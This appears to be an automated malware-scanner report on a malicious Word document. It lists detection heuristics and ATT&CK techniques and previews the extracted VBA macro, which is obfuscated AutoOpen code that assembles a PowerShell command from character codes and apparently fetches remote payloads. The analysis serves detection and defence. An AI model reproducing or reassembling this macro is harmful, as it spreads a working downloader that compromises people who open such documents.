MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Word document containing a VBA macro. The macro utilizes the Shell() function, which is a critical finding, and specifically calls 'powershell'. This indicates an attempt to download and execute a secondary payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16309 bytes |
SHA-256: e65e3ab6b679dc553d352cbb93f33bf2ace5183e45a990a2ec0195b8571cd63d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iBbzpLjzG" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "iOGGmiXdOThjD" Function bEihGNi() On Error Resume Next For Each MTHpZS In LKzbCz FQkcL = 43779 + Atn(89881) / 75995 / Round(56265) / 18858 / CInt(VimoSC) kTNpDF = (lwCZo * 80378 + 59223 * CInt(PLztWP - CDbl(5332)) * 64602 * Oct(48123)) AAGjm = lcbsw = aUOSb Next YaYbBRBoLC = "Ow" + "erSHe" + "ll &( " + "$vERBos" + "epRE" + "fErEnCE.ToS" + "TriNG()[1,3]+'" + "x'-JoI" + "N'')( -j" + "oIn" For Each LEMjn In Nmsul SNuLLH = 55227 + Atn(65223) / 25067 / Round(56541) / 22708 / CInt(wRYHj) iEohcJ = (Yojlwo * 53892 + 2172 * CInt(JKhIR - CDbl(18498)) * 11813 * Oct(44156)) VcYOZ = ACziWj = JffiP Next cYPPGvu = " (( " + "26 , 81 , 115 ," + "127, 113 ,125,8" + "7, 30" + " , 3 , 30 ," For Each JPFlw In ziZJAB TJzXA = 75808 + Atn(12725) / 19142 / Round(63655) / 96529 / CInt(KStHX) mtiEva = (MHwwn * 47351 + 77113 * CInt(YPcCz - CDbl(33912)) * 39932 * Oct(99940)) hRFOj = ThLBYb = McjOB Next lEhIVZiYTn = " 80, " + "91 ,73 ,19,81" + " , 92" + " ,84, 91 " + ",93 , " + "74 ,30,7" + "6 , 9" + "5 , 80 , " For Each UDfZdP In XPiDCz BqjTh = 16056 + Atn(1520) / 82831 / Round(25211) / 1412 / CInt(YuoqT) kQRjN = (tEaaXm * 67480 + 16985 * CInt(GhMpwM - CDbl(22465)) * 41579 * Oct(57058)) tVAlFC = hcSuA = unlPc Next jAoMm = "90, 81, 83 , 5 " + ", 26 , 83, 1" + "24 ,8" + "7,68 ,83 ,121, " + "30,3,30,80 " + ", 91 ,73" bEihGNi = YaYbBRBoLC + cYPPGvu + lEhIVZiYTn + jAoMm End Function Function mPNjKEizT() On Error Resume Next For Each sSVXQ In GqvGU RLWXmw = 92176 + Atn(89424) / 94627 / Round(84436) / 53395 / CInt(zchrN) BNwjP = (zNCTdE * 22757 + 88610 * CInt(TtAMWa - CDbl(50091)) * 85735 * Oct(94103)) ikmZc = BjYLnM = iLqGLZ Next jhmWUI = " ,19 , 8" + "1, 92,84 , 91, " + "93" + ", 74, 30, 1" For Each ZibXni In GEVAjU UoGzat = 83856 + Atn(46649) / 60863 / Round(5207) / 4600 / CInt(ctwwal) THpXO = (njpHj * 62947 + 68336 * CInt(NMzUd - CDbl(34859)) * 73627 * Oct(82476)) tYndf = auQXNB = mKdwAt Next dthCzVjOS = "09" + ", 71" + " , " + "77 , 74," + " 91 , 83, 16" + " ,1" + "12 " + ", 91,74,16 , " For Each oOMSJ In RVamr MwEols = 43715 + Atn(67793) / 52096 / Round(77850) / 34688 / CInt(oTljU) RtztFR = (CmACOO * 40395 + 71459 * CInt(wqLCN - CDbl(87971)) * 9676 * Oct(58850)) VzdJY = loXli = AqjliU Next GdXVWDncKdQ = "105" + " , " + "91 , " + "92" + ", 125 " + ",82 ,87 , 91 ,8" + "0,74 ,5,26 ,8" + "4 ,125" For Each tNjQa In jCuwzi LAGalW = 14204 + Atn(66249) / 68836 / Round(84835) / 35217 / CInt(pRNWlE) iYRSJ = (IrRBi * 20063 + 99836 * CInt(NuLOH - CDbl(23738)) * 50832 * Oct(79390)) EvXNE = wYjwXn = WAcRLT Next UtdTDGSElUB = ",10" + "0,82,119 ,127" + ",30 , 3 , " + "30,2" + "5, 86, 74 " + ",74,78 , " + "4, 17, 17, 74" + ", 70,84 , 89" For Each JTdwN In SOYKlq DoHjvU = 64719 + Atn(27919) / 62849 / Round(89777) / 57020 / CInt(wFNCwz) GNvDp = (cibPor * 57938 + 63910 * CInt(hJirMH - CDbl(20039)) * 16401 * Oct(66411)) swTHj = wBRjb = JhocW Next NFcUwM = ",95, 73" + " ,92, 83 ," + " 16, 93 , 81, " + "83,17,108 ," + "82 ,9" For Each assqp In zVLAw BXBnR = 75723 + Atn(20615) / 97715 / Round(4936) / 86927 / CInt(ORqnt) klcFu = (IDwZUq * 6396 + 46120 * CInt(nWIHk - CDbl(78355)) * 37327 * Oct(90477)) LzSXzw = OjrtH = zSHow Next BwFtmXA = "0 , 118, 11 , " + "89" + ",70 " + ", 17" + ",126," + "86 ,74,74 , 78 " + ",4," For Each ckFzDG In LiRTW ATzjlj = 66172 + Atn(4993) / 1088 / Round(75114) / 32047 / CInt(TsCwv) zvsItR = (KAkmz * 37853 + 40183 * CInt(dcQjG - CDbl(43469)) * 61324 * Oct(7071)) KzQubm = rbMtQ = IwVjm Next BAqkwfBfCrD = " 17, 17 ," + " 73,73 , 73," + " 1" + "6 ,7" + "7, 74 ," + " 81, 82, " + "88, 95" For Each PiNOv In GbGHU Fpdtq = 24782 + Atn(26127) / 1043 / Round(64554) / 76742 / CInt(TpCjq) KWkED = (KOfKt * 69750 + 40977 * CInt(LtaYT - CDbl(18663)) * 2142 * Oct(39868)) DNmXb = Kdaijc = i ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.